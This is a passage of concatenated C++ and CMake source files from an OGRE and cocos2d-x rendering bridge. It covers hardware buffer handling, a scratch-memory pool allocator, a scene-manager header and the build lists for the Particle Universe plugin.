mIsLocked = true;
return retPtr;
}
// Reads a region of the index buffer.  Only the CPU-side shadow copy can be
// read; there is no GL read-back path in this bridge.
void BridgeHardwareIndexBuffer::readData(size_t offset,
size_t length,
void* pDest)
{
    if (!mUseShadowBuffer)
    {
        OGRE_EXCEPT(Exception::ERR_INTERNAL_ERROR,
            "Reading hardware buffer is not supported",
            "BridgeHardwareIndexBuffer::readData");
    }
    // Get data from the shadow buffer
    void* shadowData = mShadowBuffer->lock(offset, length, HBL_READ_ONLY);
    memcpy(pDest, shadowData, length);
    mShadowBuffer->unlock();
}
// Writes a region into both the shadow copy and the GL buffer; mirrors the
// vertex-buffer implementation (full-range writes re-specify the buffer,
// discardWholeBuffer orphans the old storage before a partial upload).
void BridgeHardwareIndexBuffer::writeData(size_t offset, size_t length,
const void* pSource,
bool discardWholeBuffer)
{
// Update the shadow buffer
if (mUseShadowBuffer)
{
void* destData = mShadowBuffer->lock(offset, length,
discardWholeBuffer ? HBL_DISCARD : HBL_NORMAL);
memcpy(destData, pSource, length);
mShadowBuffer->unlock();
}
glBindBuffer(GL_ARRAY_BUFFER, _vbo);
CHECK_GL_ERROR_DEBUG();
if (offset == 0 && length == mSizeInBytes)
{
glBufferData(GL_ARRAY_BUFFER, mSizeInBytes, pSource,
getGLUsageByHardwareUsage(mUsage));
CHECK_GL_ERROR_DEBUG();
}
else
{
if(discardWholeBuffer)
{
// Orphan the old storage before the partial upload.
glBufferData(GL_ARRAY_BUFFER, mSizeInBytes, NULL,
getGLUsageByHardwareUsage(mUsage));
CHECK_GL_ERROR_DEBUG();
}
glBufferSubData(GL_ARRAY_BUFFER, offset, length, pSource);
CHECK_GL_ERROR_DEBUG();
}
glBindBuffer(GL_ARRAY_BUFFER, 0);
}
// Re-uploads the shadow copy into the GL buffer (after GL context loss).
// Skips the upload unless shadow data is pending and updates are allowed.
void BridgeHardwareIndexBuffer::_updateFromShadow(void)
{
    if (!mUseShadowBuffer || !mShadowUpdated || mSuppressHardwareUpdate)
        return;

    const void *shadowData = mShadowBuffer->lock(mLockStart, mLockSize, HBL_READ_ONLY);
    glBindBuffer(GL_ARRAY_BUFFER, _vbo);
    CHECK_GL_ERROR_DEBUG();
    glBufferData(GL_ARRAY_BUFFER, (GLsizeiptr)mSizeInBytes, shadowData,
                 getGLUsageByHardwareUsage(mUsage));
    CHECK_GL_ERROR_DEBUG();
    glBindBuffer(GL_ARRAY_BUFFER, 0);
    mShadowBuffer->unlock();
    mShadowUpdated = false;
}
// Scratch pool management (32 bit structure)
// Free-list control block preceding each chunk in the scratch pool; size and
// free flag are bit-packed into a single 32-bit word.
struct BridgeScratchBufferAlloc
{
/// Size in bytes
uint32 size: 31;
/// Free? (pack with size)
uint32 free: 1;
};
// Total scratch pool size and the alignment (in bytes) of the pool base.
#define SCRATCH_POOL_SIZE 1 * 1024 * 1024
#define SCRATCH_ALIGNMENT 32
// Carves the whole scratch pool out of one aligned allocation and marks it
// as a single free block headed by a BridgeScratchBufferAlloc control word.
// NOTE(review): on non-Win32 platforms mMapBufferThreshold is forced to 0,
// which makes the scratch path in lockImpl unreachable (every lock would
// throw "Invalid Buffer lockSize") -- confirm the threshold is raised again
// via setGLMapBufferThreshold() during render-system startup.
BridgeHardwareBufferManagerBase::BridgeHardwareBufferManagerBase()
{
// Init scratch pool
// TODO make it a configurable size?
// 32-bit aligned buffer
mScratchBufferPool = static_cast<char*>(OGRE_MALLOC_ALIGN(SCRATCH_POOL_SIZE,
MEMCATEGORY_GEOMETRY,
SCRATCH_ALIGNMENT));
BridgeScratchBufferAlloc* ptrAlloc = (BridgeScratchBufferAlloc*)mScratchBufferPool;
ptrAlloc->size = SCRATCH_POOL_SIZE - sizeof(BridgeScratchBufferAlloc);
ptrAlloc->free = 1;
// non-Win32 machines are having issues glBufferSubData, looks like buffer corruption
// disable for now until we figure out where the problem lies
# if OGRE_PLATFORM != OGRE_PLATFORM_WIN32
mMapBufferThreshold = 0;
# endif
}
// Tears down declarations/bindings owned by the base manager, then frees the
// scratch pool (with the same category/alignment it was allocated with).
BridgeHardwareBufferManagerBase::~BridgeHardwareBufferManagerBase()
{
destroyAllDeclarations();
destroyAllBindings();
OGRE_FREE_ALIGN(mScratchBufferPool, MEMCATEGORY_GEOMETRY, SCRATCH_ALIGNMENT);
}
// Creates a bridge vertex buffer and registers it with the manager.  The
// caller's useShadowBuffer preference is overridden: shadowing is always on
// (required for scratch locks and GL-context-loss recovery).
HardwareVertexBufferSharedPtr
BridgeHardwareBufferManagerBase::createVertexBuffer(size_t vertexSize,
size_t numVerts,
HardwareBuffer::Usage usage,
bool useShadowBuffer)
{
    BridgeHardwareVertexBuffer* newBuffer =
        OGRE_NEW BridgeHardwareVertexBuffer(this, vertexSize, numVerts, usage, true);
    {
        OGRE_LOCK_MUTEX(mVertexBuffersMutex)
        mVertexBuffers.insert(newBuffer);
    }
    return HardwareVertexBufferSharedPtr(newBuffer);
}
// Creates a bridge index buffer and registers it with the manager; shadow
// buffering is always enabled regardless of the caller's preference.
HardwareIndexBufferSharedPtr BridgeHardwareBufferManagerBase::createIndexBuffer(HardwareIndexBuffer::IndexType itype,
size_t numIndexes,
HardwareBuffer::Usage usage,
bool useShadowBuffer)
{
    BridgeHardwareIndexBuffer* newBuffer =
        OGRE_NEW BridgeHardwareIndexBuffer(this, itype, numIndexes, usage, true);
    {
        OGRE_LOCK_MUTEX(mIndexBuffersMutex)
        mIndexBuffers.insert(newBuffer);
    }
    return HardwareIndexBufferSharedPtr(newBuffer);
}
// Render-to-vertex-buffer is not implemented by this bridge; callers receive
// an empty shared pointer.
RenderToVertexBufferSharedPtr BridgeHardwareBufferManagerBase::createRenderToVertexBuffer()
{
    return RenderToVertexBufferSharedPtr();
}
// First-fit allocation from the scratch pool.  Walks the implicit free list
// (each chunk is prefixed by a BridgeScratchBufferAlloc control word),
// splitting the first large-enough free chunk when the remainder can hold
// another control block.  Returns 0 when no chunk fits.
void* BridgeHardwareBufferManagerBase::allocateScratch(uint32 size)
{
// simple forward link search based on alloc sizes
// not that fast but the list should never get that long since not many
// locks at once (hopefully)
OGRE_LOCK_MUTEX(mScratchMutex)
// Alignment - round up the size to 32 bits
// control blocks are 32 bits too so this packs nicely
if (size % 4 != 0)
{
size += 4 - (size % 4);
}
uint32 bufferPos = 0;
while (bufferPos < SCRATCH_POOL_SIZE)
{
BridgeScratchBufferAlloc* pNext = (BridgeScratchBufferAlloc*)(mScratchBufferPool + bufferPos);
// Big enough?
if (pNext->free && pNext->size >= size)
{
// split? And enough space for control block
if(pNext->size > size + sizeof(BridgeScratchBufferAlloc))
{
uint32 offset = sizeof(BridgeScratchBufferAlloc) + size;
BridgeScratchBufferAlloc* pSplitAlloc = (BridgeScratchBufferAlloc*)
(mScratchBufferPool + bufferPos + offset);
pSplitAlloc->free = 1;
// split size is remainder minus new control block
pSplitAlloc->size = pNext->size - size - sizeof(BridgeScratchBufferAlloc);
// New size of current
pNext->size = size;
}
// allocate and return
pNext->free = 0;
// return pointer just after this control block (++ will do that for us)
return ++pNext;
}
bufferPos += sizeof(BridgeScratchBufferAlloc) + pNext->size;
}
// no available alloc
return 0;
}
// Returns a scratch chunk to the pool: linear search for the control block
// owning @p ptr, mark it free, then coalesce with the previous and following
// chunks when those are free.  Asserts if the pointer is not from this pool.
void BridgeHardwareBufferManagerBase::deallocateScratch(void* ptr)
{
OGRE_LOCK_MUTEX(mScratchMutex)
// Simple linear search dealloc
uint32 bufferPos = 0;
BridgeScratchBufferAlloc* pLast = 0;
while (bufferPos < SCRATCH_POOL_SIZE)
{
BridgeScratchBufferAlloc* pCurrent = (BridgeScratchBufferAlloc*)(mScratchBufferPool + bufferPos);
// Pointers match?
if ((mScratchBufferPool + bufferPos + sizeof(BridgeScratchBufferAlloc)) == ptr)
{
// dealloc
pCurrent->free = 1;
// merge with previous
if (pLast && pLast->free)
{
// adjust buffer pos
bufferPos -= (pLast->size + sizeof(BridgeScratchBufferAlloc));
// merge free space
pLast->size += pCurrent->size + sizeof(BridgeScratchBufferAlloc);
pCurrent = pLast;
}
// merge with next
uint32 offset = bufferPos + pCurrent->size + sizeof(BridgeScratchBufferAlloc);
if (offset < SCRATCH_POOL_SIZE)
{
BridgeScratchBufferAlloc* pNext = (BridgeScratchBufferAlloc*)(
mScratchBufferPool + offset);
if (pNext->free)
{
pCurrent->size += pNext->size + sizeof(BridgeScratchBufferAlloc);
}
}
// done
return;
}
bufferPos += sizeof(BridgeScratchBufferAlloc) + pCurrent->size;
pLast = pCurrent;
}
// Should never get here unless there's a corruption
assert(false && "Memory deallocation error");
}
//---------------------------------------------------------------------
// Buffers locked with a length below this threshold go through the scratch
// pool; larger lock requests are rejected by the buffer classes.
size_t BridgeHardwareBufferManagerBase::getGLMapBufferThreshold() const
{
return mMapBufferThreshold;
}
//---------------------------------------------------------------------
// Overrides the scratch-lock size threshold (see getGLMapBufferThreshold).
void BridgeHardwareBufferManagerBase::setGLMapBufferThreshold( const size_t value )
{
mMapBufferThreshold = value;
}
}
<file_sep>#-------------------------------------------------------------------
# This file is part of the CMake build system for OGRE
# (Object-oriented Graphics Rendering Engine)
# For the latest info, see http://www.ogre3d.org/
#
# The contents of this file are placed in the public domain. Feel
# free to make use of it in any way you like.
#-------------------------------------------------------------------
# Configure the Ogre/cocos2d bridge ("thirdparty") static library build
set(HEADER_FILES
OgreRenderScene.h
OgreOgreSprite3D.h
OgreParticleSprite3D.h
OgreOgreManager.h
OgreNodeProtocol.h
OgreBridgeSceneManager.h
OgreBridgeImageCodec.h
OgreBridgeFileSystemArchive.h
)
set(SOURCE_FILES
OgreRenderScene.cpp
OgreOgreSprite3D.cpp
OgreParticleSprite3D.cpp
OgreOgreManager.cpp
OgreNodeProtocol.cpp
OgreBridgeSceneManager.cpp
OgreBridgeImageCodec.cpp
OgreBridgeFileSystemArchive.cpp
)
include_directories(
${CMAKE_CURRENT_SOURCE_DIR}/include
)
# Pull in the Ogre subsystems this bridge depends on.
add_subdirectory(./ogre/ogre_main)
add_subdirectory(./ogre/ogre_particlefx)
add_subdirectory(./ogre/ogre_pu)
add_subdirectory(./ogre/ogre_rendersystem)
add_library(thirdparty STATIC
${SOURCE_FILES}
)
set_target_properties(thirdparty
PROPERTIES
ARCHIVE_OUTPUT_DIRECTORY "${CMAKE_BINARY_DIR}/lib"
LIBRARY_OUTPUT_DIRECTORY "${CMAKE_BINARY_DIR}/lib"
)
<file_sep>#ifndef OGRE_BRIDGE_SCENE_MANAGER_H
#define OGRE_BRIDGE_SCENE_MANAGER_H
#include "cocos2d.h"
#include <Ogre.h>
#include <OgreSceneManager.h>
namespace Ogre {
class BridgeRenderQueue : public RenderQueue
{
// Borrowed pointer to the cocos2d model-view matrix for the current visit.
cocos2d::Mat4 *mCocosMatrix4;
public:
int mIndex;
// Renderable/pass pairs partitioned by transparency during addRenderable().
std::vector<RenderablePass> mSolidRenderable;
std::vector<RenderablePass> mTransparentRenderable;
// Pre-allocated pools built in the constructor (see below).
std::vector<cocos2d::MeshCommand *> mMeshCommand;
std::vector<cocos2d::GLProgramState *> mProgramState;
// Pre-allocates a fixed pool of GLProgramState/MeshCommand pairs using the
// position-texture-colour shader.
// NOTE(review): the pool size 10 is hard-coded -- confirm it bounds the
// number of renderables handled per queue.
BridgeRenderQueue() :mCocosMatrix4(NULL)
{
for(int i = 0;i < 10; i ++)
{
auto glProgram =cocos2d::GLProgramCache::getInstance()->getGLProgram(cocos2d::GLProgram::SHADER_NAME_POSITION_TEXTURE_COLOR);
auto programstate = cocos2d::GLProgramState::create(glProgram);
programstate->retain(); // keep the autoreleased state alive for the queue's lifetime
mProgramState.push_back(programstate);
mMeshCommand.push_back(new cocos2d::MeshCommand());
}
};
virtual ~BridgeRenderQueue(){};
void setCocosMatrix4(cocos2d::Mat4 *mat)
{
mCocosMatrix4 = mat;
}
cocos2d::Mat4 * getCocosMatrix4()
{
return mCocosMatrix4;
}
virtual void addRenderable(Renderable* pRend, uint8 groupID, ushort priority)
{
pRend->setCocosMatrix4(mCocosMatrix4);
//RenderQueue::addRenderable(pRend, groupID, priority);
Technique* pTech;
// tell material it's been used
if (!pRend->getMaterial().isNull())
pRend->getMaterial()->touch();
// Check material & technique supplied (the former since the default implementation
// of getTechnique is based on it for backwards compatibility
if(pRend->getMaterial().isNull() || !pRend->getTechnique())
{
// Use default base white
MaterialPtr baseWhite = MaterialManager::getSingleton().getByName("BaseWhite");
pTech = baseWhite->getTechnique(0);
}
else
pTech = pRend->getTechnique();
if (mRenderableListener)
{
// Allow listener to override technique and to abort
if (!mRenderableListener->renderableQueued(pRend, groupID, priority,
&pTech, this))
return; // rejected
// tell material it's been used (incase changed)
pTech->getParent()->touch();
}
// Transparent and depth/colour settings mean depth sorting is required?
// Note: colour write disabled with depth check/write enabled means
// setup depth buffer for other passes use.
if (pTech->isTransparentSortingForced() ||
(pTech->isTransparent() &&
(!pTech->isDepthWriteEnabled() ||
!pTech->isDepthCheckEnabled() ||
pTech->hasColourWriteDisabled())))
{
Technique::PassIterator pi = pTech->getPassIterator();
while (pi.hasMoreElements())
{
// Insert into transparent list
mTransparentRenderable.push_back(RenderablePass(pRend, pi.getNext()));
}
}
else
{
Technique::PassIterator pi = pTech->getPassIterator();
/* while (pi.hasMoreElements())
{
auto glProgram =cocos2d::GLProgramCache::getInstance()->getGLProgram(cocos2d::GLProgram::SHADER_NAME_POSITION_TEXTURE_COLOR);
auto programstate = cocos2d::GLProgramState::create(glProgram);
programstate->retain();
mProgramState.push_back(programstate);
mMeshCommand.push_back(new cocos2d::MeshCommand());
mSolidRenderable.push_back(RenderablePass(pRend, pi.getNext()));
}*/
}
}
};
/// Default scene manager
/// Scene manager that renders through cocos2d-x rather than an OGRE
/// RenderSystem.  The rendering entry points (_beforeRender/_draw/_render/
/// _afterRender) are implemented in the accompanying .cpp file.
class BridgeSceneManager : public SceneManager
{
// Shader used when drawing — ownership not visible here; TODO(review) confirm.
cocos2d::GLProgram* mShaderProgram;
// Custom render queue; presumably created in initRenderQueue() and released
// in clearSceneManager() — the destructor does not delete it; confirm.
BridgeRenderQueue *mBridgeRenderQueue;
public:
BridgeSceneManager(const String& name)
: SceneManager(name)
, mShaderProgram(NULL)
,mBridgeRenderQueue(NULL)
{}
~BridgeSceneManager(){}
// Tears down bridge-specific state (implementation in .cpp).
void clearSceneManager();
// Installs the BridgeRenderQueue as this manager's queue.
void initRenderQueue(void);
// Binds the viewport/camera and the shader program used for drawing.
void initSceneManager(Viewport *vPort, Camera *camera, cocos2d::GLProgram*);
void _beforeRender();
void _draw(MovableObject *object,cocos2d::Renderer *render);
void _render();
void _render(Ogre::RenderablePass &obj,cocos2d::Renderer *render,cocos2d::GLProgramState *state,cocos2d::MeshCommand *cmd);
void _afterRender();
// Returns BridgeSceneManagerFactory::FACTORY_TYPE_NAME.
const String& getTypeName(void) const;
};
/// Factory that produces BridgeSceneManager instances; register it with
/// Ogre::Root to make this scene-manager type available by name.
class BridgeSceneManagerFactory : public SceneManagerFactory
{
protected:
// Fills in factory metadata (type name / description) for the enumerator.
void initMetaData(void) const;
public:
BridgeSceneManagerFactory(){}
~BridgeSceneManagerFactory() {}
/// Factory type name
static const String FACTORY_TYPE_NAME;
SceneManager* createInstance(const String& instanceName)
{
return OGRE_NEW BridgeSceneManager(instanceName);
}
// OGRE_DELETE must mirror the OGRE_NEW used in createInstance.
void destroyInstance(SceneManager* instance)
{
OGRE_DELETE instance;
}
};
}
#endif // OGRE_BRIDGE_SCENE_MANAGER_H
<file_sep>/****************************************************************************
Copyright (c) 2014 Chukong Technologies Inc.
http://www.cocos2d-x.org
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
****************************************************************************/
#ifndef __BERYL_BILLBOARD_H__
#define __BERYL_BILLBOARD_H__
#include "2d/CCSprite.h"
NS_CC_BEGIN
/**
 * Billboard node: overrides visit() to orient itself toward the camera.
 * NOTE(review): despite the original comment ("Inherit from Sprite"),
 * this class derives from cocos2d::Node, not Sprite.
 */
class CameraBillBoard : public Node
{
public:
// Recomputes the node transform against the camera before visiting children.
virtual void visit(Renderer* renderer, const Mat4 &parentTransform, uint32_t parentFlags) override;
CREATE_FUNC(CameraBillBoard);
CC_CONSTRUCTOR_ACCESS:
CameraBillBoard(){};
virtual ~CameraBillBoard(){};
protected:
private:
CC_DISALLOW_COPY_AND_ASSIGN(CameraBillBoard);
};
NS_CC_END
#endif // __BERYL_BILLBOARD_H__
<file_sep>#-------------------------------------------------------------------
# This file is part of the CMake build system for OGRE
# (Object-oriented Graphics Rendering Engine)
# For the latest info, see http://www.ogre3d.org/
#
# The contents of this file are placed in the public domain. Feel
# free to make use of it in any way you like.
#-------------------------------------------------------------------
# Configure Particle Universe plugin build
# Public headers of the Particle Universe plugin.
# NOTE(review): this list is not attached to the library target below, so it
# only serves as documentation / IDE grouping.
set (HEADER_FILES
# -- core --
include/ParticleUniverseAffector.h
include/ParticleUniverseAffectorTokens.h
include/ParticleUniverseAliasTokens.h
include/ParticleUniverseAtlasImage.h
include/ParticleUniverseAttachable.h
include/ParticleUniverseAttachableTokens.h
include/ParticleUniverseBehaviourTokens.h
include/ParticleUniverseCameraDependency.h
include/ParticleUniverseCameraDependencyTokens.h
include/ParticleUniverseDll.h
include/ParticleUniverseDynamicAttribute.h
include/ParticleUniverseDynamicAttributeTokens.h
include/ParticleUniverseEmitter.h
include/ParticleUniverseEmitterTokens.h
include/ParticleUniverseEventHandlerTokens.h
include/ParticleUniverseExtern.h
include/ParticleUniverseExternTokens.h
include/ParticleUniverseForceField.h
include/ParticleUniverseNoise.h
include/ParticleUniverseObserver.h
include/ParticleUniverseObserverTokens.h
include/ParticleUniverseParticle.h
include/ParticleUniverseParticlePool.h
include/ParticleUniversePCH.h
include/ParticleUniversePlugin.h
include/ParticleUniverseRenderer.h
include/ParticleUniverseRendererTokens.h
include/ParticleUniverseScriptDeserializer.h
include/ParticleUniverseScriptSerializer.h
include/ParticleUniverseSystem.h
include/ParticleUniverseSystemManager.h
include/ParticleUniverseSystemManagerTokens.h
include/ParticleUniverseSystemTokens.h
include/ParticleUniverseTechnique.h
include/ParticleUniverseTechniqueTokens.h
include/ParticleUniverseVisualParticle.h
# -- emitters --
include/ParticleEmitters/ParticleUniverseBoxEmitter.h
include/ParticleEmitters/ParticleUniverseBoxEmitterTokens.h
include/ParticleEmitters/ParticleUniverseCircleEmitter.h
include/ParticleEmitters/ParticleUniverseCircleEmitterTokens.h
include/ParticleEmitters/ParticleUniverseLineEmitter.h
include/ParticleEmitters/ParticleUniverseLineEmitterTokens.h
include/ParticleEmitters/ParticleUniverseMeshSurfaceEmitter.h
include/ParticleEmitters/ParticleUniverseMeshSurfaceEmitterTokens.h
include/ParticleEmitters/ParticleUniversePointEmitter.h
include/ParticleEmitters/ParticleUniversePointEmitterTokens.h
include/ParticleEmitters/ParticleUniversePositionEmitter.h
include/ParticleEmitters/ParticleUniversePositionEmitterTokens.h
include/ParticleEmitters/ParticleUniverseSlaveEmitter.h
include/ParticleEmitters/ParticleUniverseSlaveEmitterTokens.h
include/ParticleEmitters/ParticleUniverseSphereSurfaceEmitter.h
include/ParticleEmitters/ParticleUniverseSphereSurfaceEmitterTokens.h
include/ParticleEmitters/ParticleUniverseVertexEmitter.h
include/ParticleEmitters/ParticleUniverseVertexEmitterTokens.h
# -- renderers --
include/ParticleRenderers/ParticleUniverseBeamRenderer.h
include/ParticleRenderers/ParticleUniverseBeamRendererTokens.h
include/ParticleRenderers/ParticleUniverseBillboardRenderer.h
include/ParticleRenderers/ParticleUniverseBillboardRendererTokens.h
include/ParticleRenderers/ParticleUniverseBox.h
include/ParticleRenderers/ParticleUniverseBoxRenderer.h
include/ParticleRenderers/ParticleUniverseBoxRendererTokens.h
include/ParticleRenderers/ParticleUniverseBoxSet.h
include/ParticleRenderers/ParticleUniverseEntityRenderer.h
include/ParticleRenderers/ParticleUniverseEntityRendererTokens.h
include/ParticleRenderers/ParticleUniverseLightRenderer.h
include/ParticleRenderers/ParticleUniverseLightRendererTokens.h
include/ParticleRenderers/ParticleUniversePrimitiveShapeSet.h
include/ParticleRenderers/ParticleUniverseRibbonTrailRenderer.h
include/ParticleRenderers/ParticleUniverseRibbonTrailRendererTokens.h
include/ParticleRenderers/ParticleUniverseSphere.h
include/ParticleRenderers/ParticleUniverseSphereRenderer.h
include/ParticleRenderers/ParticleUniverseSphereRendererTokens.h
include/ParticleRenderers/ParticleUniverseSphereSet.h
# -- affectors --
include/ParticleAffectors/ParticleUniverseAlignAffector.h
include/ParticleAffectors/ParticleUniverseAlignAffectorTokens.h
include/ParticleAffectors/ParticleUniverseBaseCollider.h
include/ParticleAffectors/ParticleUniverseBaseColliderTokens.h
include/ParticleAffectors/ParticleUniverseBaseForceAffector.h
include/ParticleAffectors/ParticleUniverseBaseForceAffectorTokens.h
include/ParticleAffectors/ParticleUniverseBoxCollider.h
include/ParticleAffectors/ParticleUniverseBoxColliderTokens.h
include/ParticleAffectors/ParticleUniverseCollisionAvoidanceAffector.h
include/ParticleAffectors/ParticleUniverseCollisionAvoidanceAffectorTokens.h
include/ParticleAffectors/ParticleUniverseColourAffector.h
include/ParticleAffectors/ParticleUniverseColourAffectorTokens.h
include/ParticleAffectors/ParticleUniverseFlockCenteringAffector.h
include/ParticleAffectors/ParticleUniverseFlockCenteringAffectorTokens.h
include/ParticleAffectors/ParticleUniverseForceFieldAffector.h
include/ParticleAffectors/ParticleUniverseForceFieldAffectorTokens.h
include/ParticleAffectors/ParticleUniverseGeometryRotator.h
include/ParticleAffectors/ParticleUniverseGeometryRotatorTokens.h
include/ParticleAffectors/ParticleUniverseGravityAffector.h
include/ParticleAffectors/ParticleUniverseGravityAffectorTokens.h
include/ParticleAffectors/ParticleUniverseInterParticleCollider.h
include/ParticleAffectors/ParticleUniverseInterParticleColliderTokens.h
include/ParticleAffectors/ParticleUniverseJetAffector.h
include/ParticleAffectors/ParticleUniverseJetAffectorTokens.h
include/ParticleAffectors/ParticleUniverseLineAffector.h
include/ParticleAffectors/ParticleUniverseLineAffectorTokens.h
include/ParticleAffectors/ParticleUniverseLinearForceAffector.h
include/ParticleAffectors/ParticleUniverseLinearForceAffectorTokens.h
include/ParticleAffectors/ParticleUniverseParticleFollower.h
include/ParticleAffectors/ParticleUniverseParticleFollowerTokens.h
include/ParticleAffectors/ParticleUniversePathFollower.h
include/ParticleAffectors/ParticleUniversePathFollowerTokens.h
include/ParticleAffectors/ParticleUniversePlaneCollider.h
include/ParticleAffectors/ParticleUniversePlaneColliderTokens.h
include/ParticleAffectors/ParticleUniverseRandomiser.h
include/ParticleAffectors/ParticleUniverseRandomiserTokens.h
include/ParticleAffectors/ParticleUniverseScaleAffector.h
include/ParticleAffectors/ParticleUniverseScaleAffectorTokens.h
include/ParticleAffectors/ParticleUniverseScaleVelocityAffector.h
include/ParticleAffectors/ParticleUniverseScaleVelocityAffectorTokens.h
include/ParticleAffectors/ParticleUniverseSineForceAffector.h
include/ParticleAffectors/ParticleUniverseSineForceAffectorTokens.h
include/ParticleAffectors/ParticleUniverseSphereCollider.h
include/ParticleAffectors/ParticleUniverseSphereColliderTokens.h
include/ParticleAffectors/ParticleUniverseTextureAnimator.h
include/ParticleAffectors/ParticleUniverseTextureAnimatorTokens.h
include/ParticleAffectors/ParticleUniverseTextureRotator.h
include/ParticleAffectors/ParticleUniverseTextureRotatorTokens.h
include/ParticleAffectors/ParticleUniverseVelocityMatchingAffector.h
include/ParticleAffectors/ParticleUniverseVelocityMatchingAffectorTokens.h
include/ParticleAffectors/ParticleUniverseVortexAffector.h
include/ParticleAffectors/ParticleUniverseVortexAffectorTokens.h
# -- observers --
include/ParticleObservers/ParticleUniverseOnClearObserver.h
include/ParticleObservers/ParticleUniverseOnClearObserverTokens.h
include/ParticleObservers/ParticleUniverseOnCollisionObserver.h
include/ParticleObservers/ParticleUniverseOnCollisionObserverTokens.h
include/ParticleObservers/ParticleUniverseOnCountObserver.h
include/ParticleObservers/ParticleUniverseOnCountObserverTokens.h
include/ParticleObservers/ParticleUniverseOnEmissionObserver.h
include/ParticleObservers/ParticleUniverseOnEmissionObserverTokens.h
include/ParticleObservers/ParticleUniverseOnEventFlagObserver.h
include/ParticleObservers/ParticleUniverseOnEventFlagObserverTokens.h
include/ParticleObservers/ParticleUniverseOnExpireObserver.h
include/ParticleObservers/ParticleUniverseOnExpireObserverTokens.h
include/ParticleObservers/ParticleUniverseOnPositionObserver.h
include/ParticleObservers/ParticleUniverseOnPositionObserverTokens.h
include/ParticleObservers/ParticleUniverseOnQuotaObserver.h
include/ParticleObservers/ParticleUniverseOnQuotaObserverTokens.h
include/ParticleObservers/ParticleUniverseOnRandomObserver.h
include/ParticleObservers/ParticleUniverseOnRandomObserverTokens.h
include/ParticleObservers/ParticleUniverseOnTimeObserver.h
include/ParticleObservers/ParticleUniverseOnTimeObserverTokens.h
include/ParticleObservers/ParticleUniverseOnVelocityObserver.h
include/ParticleObservers/ParticleUniverseOnVelocityObserverTokens.h
# -- event handlers --
include/ParticleEventHandlers/ParticleUniverseDoAffectorEventHandler.h
include/ParticleEventHandlers/ParticleUniverseDoAffectorEventHandlerTokens.h
include/ParticleEventHandlers/ParticleUniverseDoEnableComponentEventHandler.h
include/ParticleEventHandlers/ParticleUniverseDoEnableComponentEventHandlerTokens.h
include/ParticleEventHandlers/ParticleUniverseDoExpireEventHandler.h
include/ParticleEventHandlers/ParticleUniverseDoExpireEventHandlerTokens.h
include/ParticleEventHandlers/ParticleUniverseDoFreezeEventHandler.h
include/ParticleEventHandlers/ParticleUniverseDoFreezeEventHandlerTokens.h
include/ParticleEventHandlers/ParticleUniverseDoPlacementParticleEventHandler.h
include/ParticleEventHandlers/ParticleUniverseDoPlacementParticleEventHandlerTokens.h
include/ParticleEventHandlers/ParticleUniverseDoScaleEventHandler.h
include/ParticleEventHandlers/ParticleUniverseDoScaleEventHandlerTokens.h
include/ParticleEventHandlers/ParticleUniverseDoStopSystemEventHandler.h
include/ParticleEventHandlers/ParticleUniverseDoStopSystemEventHandlerTokens.h
# -- externs --
include/Externs/ParticleUniverseBoxColliderExtern.h
include/Externs/ParticleUniverseBoxColliderExternTokens.h
include/Externs/ParticleUniverseGravityExtern.h
include/Externs/ParticleUniverseGravityExternTokens.h
include/Externs/ParticleUniversePhysXActorExtern.h
include/Externs/ParticleUniversePhysXActorExternTokens.h
include/Externs/ParticleUniversePhysXBridge.h
include/Externs/ParticleUniversePhysXFluidExtern.h
include/Externs/ParticleUniversePhysXFluidExternTokens.h
include/Externs/ParticleUniverseSceneDecoratorExtern.h
include/Externs/ParticleUniverseSceneDecoratorExternTokens.h
include/Externs/ParticleUniverseSphereColliderExtern.h
include/Externs/ParticleUniverseSphereColliderExternTokens.h
include/Externs/ParticleUniverseVortexExtern.h
include/Externs/ParticleUniverseVortexExternTokens.h
# -- behaviours --
include/ParticleBehaviours/ParticleUniverseSlaveBehaviour.h
include/ParticleBehaviours/ParticleUniverseSlaveBehaviourTokens.h
)
# Sources of the Particle Universe plugin; this list is what actually gets
# compiled into the ogre_particleuniverse target below.
set (SOURCE_FILES
# -- core --
src/ParticleUniverseAffector.cpp
src/ParticleUniverseAffectorTokens.cpp
src/ParticleUniverseAliasTokens.cpp
src/ParticleUniverseAtlasImage.cpp
src/ParticleUniverseAttachable.cpp
src/ParticleUniverseAttachableTokens.cpp
src/ParticleUniverseBehaviourTokens.cpp
src/ParticleUniverseCameraDependency.cpp
src/ParticleUniverseCameraDependencyTokens.cpp
src/ParticleUniverseDll.cpp
src/ParticleUniverseDynamicAttribute.cpp
src/ParticleUniverseDynamicAttributeTokens.cpp
src/ParticleUniverseEmitter.cpp
src/ParticleUniverseEmitterTokens.cpp
src/ParticleUniverseEventHandlerTokens.cpp
src/ParticleUniverseExtern.cpp
src/ParticleUniverseExternTokens.cpp
src/ParticleUniverseForceField.cpp
src/ParticleUniverseNoise.cpp
src/ParticleUniverseObserver.cpp
src/ParticleUniverseObserverTokens.cpp
src/ParticleUniverseParticle.cpp
src/ParticleUniverseParticlePool.cpp
src/ParticleUniversePCH.cpp
src/ParticleUniversePlugin.cpp
src/ParticleUniverseRenderer.cpp
src/ParticleUniverseRendererTokens.cpp
src/ParticleUniverseScriptDeserializer.cpp
src/ParticleUniverseScriptSerializer.cpp
src/ParticleUniverseSystem.cpp
src/ParticleUniverseSystemManager.cpp
src/ParticleUniverseSystemManagerTokens.cpp
src/ParticleUniverseSystemTokens.cpp
src/ParticleUniverseTechnique.cpp
src/ParticleUniverseTechniqueTokens.cpp
src/ParticleUniverseVisualParticle.cpp
# -- emitters --
src/ParticleEmitters/ParticleUniverseBoxEmitter.cpp
src/ParticleEmitters/ParticleUniverseBoxEmitterTokens.cpp
